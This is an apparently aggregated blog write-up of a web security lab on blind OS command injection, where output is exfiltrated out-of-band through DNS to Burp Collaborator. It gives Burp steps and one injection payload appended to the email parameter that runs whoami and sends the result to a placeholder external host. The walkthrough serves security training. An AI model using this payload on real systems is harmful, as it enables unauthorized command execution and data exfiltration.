4.5 Lab: Blind OS command injection with out-of-band data exfiltration | 2024

3 months ago 60
BOOK THIS SPACE FOR AD
ARTICLE AD

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. You can trigger out-of-band interactions with an external domain. You will need to enter the name of the current user to complete the lab | Karthikeyan Nagaraj

Karthikeyan Nagaraj

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab

Click submit feedbackType some dummy values, capture the request, and send it to the repeaterIn Burp, click on the Burp Menu and click Burp Collaborator clientClick Copy to Clipboard and set polling seconds to 1.Add this payload at the end of the email parameter with the Collaborator link that you copied and send the request.
||nslookup+`whoami`.BURP_COLLABORATOR_CLIENT||You will receive the username as a result of whoami command in the collaborator’s responseSubmit the username in Submit Solution to solve the Lab
Read Entire Article